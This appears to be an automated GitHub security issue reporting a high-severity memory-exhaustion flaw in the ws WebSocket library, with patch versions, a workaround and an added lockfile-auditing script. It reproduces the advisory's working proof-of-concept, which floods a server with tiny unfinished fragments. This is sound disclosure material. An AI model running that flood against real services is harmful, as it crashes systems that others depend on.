
[HIGH] CVE-2026-48779: Package: ws Installed Version: 8.20.1 Vulnerability CVE-2026-48779 Severity: ... #128

Description

@github-actions

🟠 High Security Finding

Scanner: Trivy
Rule: CVE-2026-48779
Severity: HIGH
File: pnpm-lock.yaml:1

Description

Package: ws
Installed Version: 8.20.1
Vulnerability CVE-2026-48779
Severity: HIGH
Fixed Version: 5.2.5, 6.2.4, 7.5.11, 8.21.0
Link: CVE-2026-48779

Remediation Guidance

Vulnerability CVE-2026-48779
Severity: HIGH
Package: ws
Fixed Version: 5.2.5, 6.2.4, 7.5.11, 8.21.0
Link: CVE-2026-48779

Impact

A peer can send a high volume of exceptionally small fragments and data chunks, using only modest network traffic, and force the remote peer to allocate and hold structural wrappers that consume far more memory than the documented default message-size limit, leading to process termination by OOM.

Proof of concept

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).
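As an added example, not part of the scanner output, the advisory, or the ws project: a small script that reads the ws versions recorded in a pnpm-lock.yaml and compares each one against the fixed release on its own major line, which is the comparison behind the "Installed Version 8.20.1 / Fixed Version 8.21.0" pairing in the finding above. The lockfile fragment, the integrity placeholders, and the treatment of majors the advisory does not list (below 5.x or above 8.x) are assumptions made for the example.

```javascript
// Added example (not part of the Trivy finding, the advisory, or the ws
// project): audit ws versions in a pnpm lockfile against the fixed versions
// listed for CVE-2026-48779.

// Fixed versions from the advisory, lowest major line first.
const FIXED_VERSIONS = ['5.2.5', '6.2.4', '7.5.11', '8.21.0'];

// Parse "major.minor.patch" (any prerelease/build suffix is ignored).
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error(`not a semver version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Returns -1, 0 or 1 like a comparator.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// The fixed release on the same major line as `installed`, or null when the
// advisory lists no release for that line.
function fixedVersionFor(installed) {
  const major = parseVersion(installed)[0];
  const fix = FIXED_VERSIONS.find((f) => parseVersion(f)[0] === major);
  return fix === undefined ? null : fix;
}

function isVulnerable(installed) {
  const fix = fixedVersionFor(installed);
  if (fix !== null) return compareVersions(installed, fix) < 0;
  // Assumption for majors the advisory does not list: anything older than the
  // lowest fixed line (5.x) has no backport and must move to a fixed line;
  // anything newer than the highest fixed line (8.x) shipped after the fix.
  const major = parseVersion(installed)[0];
  return major < parseVersion(FIXED_VERSIONS[0])[0];
}

// Constructed pnpm-lock.yaml fragment for the example; the integrity values
// are placeholders, not real hashes.
const SAMPLE_LOCKFILE = `lockfileVersion: '9.0'

importers:
  .:
    dependencies:
      ws:
        specifier: ^8.20.1
        version: 8.20.1

packages:

  express-ws@5.0.2:
    resolution: {integrity: sha512-PLACEHOLDER}

  ws@7.5.11:
    resolution: {integrity: sha512-PLACEHOLDER}

  ws@8.20.1:
    resolution: {integrity: sha512-PLACEHOLDER}
    engines: {node: '>=10.0.0'}
`;

// Collect every package key of the form "ws@<version>:" (pnpm v9) or
// "/ws@<version>:" (pnpm v6). Peer-dependency suffixes such as
// "ws@8.20.1(bufferutil@4.0.8):" are tolerated; "express-ws@..." and
// "@types/ws@..." do not match because the key must start with "ws@".
// Duplicates (e.g. the same version in "packages:" and "snapshots:") are
// collapsed.
function findWsVersions(lockfileText) {
  const re = /^[ \t]+\/?ws@(\d+\.\d+\.\d+)[^:\n]*:/gm;
  const versions = new Set();
  let m;
  while ((m = re.exec(lockfileText)) !== null) versions.add(m[1]);
  return [...versions];
}

// One record per ws version found: what is installed, what the advisory
// says to move to on that line, and whether it is still vulnerable.
function auditLockfile(lockfileText) {
  return findWsVersions(lockfileText).map((installed) => ({
    installed,
    fixedVersion: fixedVersionFor(installed),
    vulnerable: isVulnerable(installed),
  }));
}

console.table(auditLockfile(SAMPLE_LOCKFILE));
```

Run it with `node` against the constructed fragment and the report flags 8.20.1 as vulnerable with 8.21.0 as the target, while 7.5.11 passes; point `auditLockfile` at the real `pnpm-lock.yaml` contents to reproduce the finding for a repository, keeping in mind that a lockfile may carry several ws versions through transitive dependencies and each one needs to clear its own line's fix.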

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option where that is possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

This issue was automatically created by repo-sentinel. Assigned to Copilot for an automated fix attempt.

Metadata

Assignees: No one assigned
Labels: security (Security vulnerability finding)
Projects: No projects
Milestone: No milestone
Relationships: None yet
Development: No branches or pull requests